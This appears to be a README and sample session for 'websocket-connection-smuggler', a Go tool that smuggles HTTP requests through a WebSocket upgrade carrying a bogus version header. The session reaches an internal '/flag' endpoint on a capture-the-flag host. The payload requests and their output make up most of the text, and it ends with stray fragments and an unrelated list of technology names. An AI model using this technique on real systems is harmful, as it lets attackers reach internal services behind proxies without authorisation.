$ go get -u github.com/c-bata/go-prompt
$ go get github.com/hahwul/websocket-connection-smuggler
or
$ git clone https://github.com/hahwul/websocket-connection-smuggler
$ cd websocket-connection-smuggler
$ go build
$ ./websocket-connection-smuggler
$ websocket-connection-smuggler
$ WCS(...) > set target {your target}
# HTTPS
$ WCS(...) > set ssl true
# HTTP
$ WCS(...) > set ssl false
It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.
$ WCS(...) > set o_data
e.g
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
It used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.
$ WCS(...) > set s_data
e.g
GET /flag HTTP/1.1
Host: localhost:5000
___
/ \\
/\\ | . . \\
////\\| ||
//// \\ ___//\
/// \\ \
/// |\\ |
// | \\ \ \
/ | \\ \ \
| \\ / /
| \/ /
---------
WebSocket Connection Smuggler
by @hahwul
WCS(target=>None | ssl=>false ) > set target challenge.0ang3el.tk:80
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set o_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set s_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > send
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
2019/11/30 03:39:15 HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 49
Date: Fri, 29 Nov 2019 18:39:15 GMT
{"flag": "In 50VI37 rUS5I4 vODK@ DRiNKs YOu!!!"}
gth: 119
Date: Fri, 29 Nov 2019 18:39:14 GMT
�0{"pingInterval":25000,"pingTimeout":60000,"upgrades":["websocket"],"sid":"5148720e07f240a99e6aa7457f41686f"}�40
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent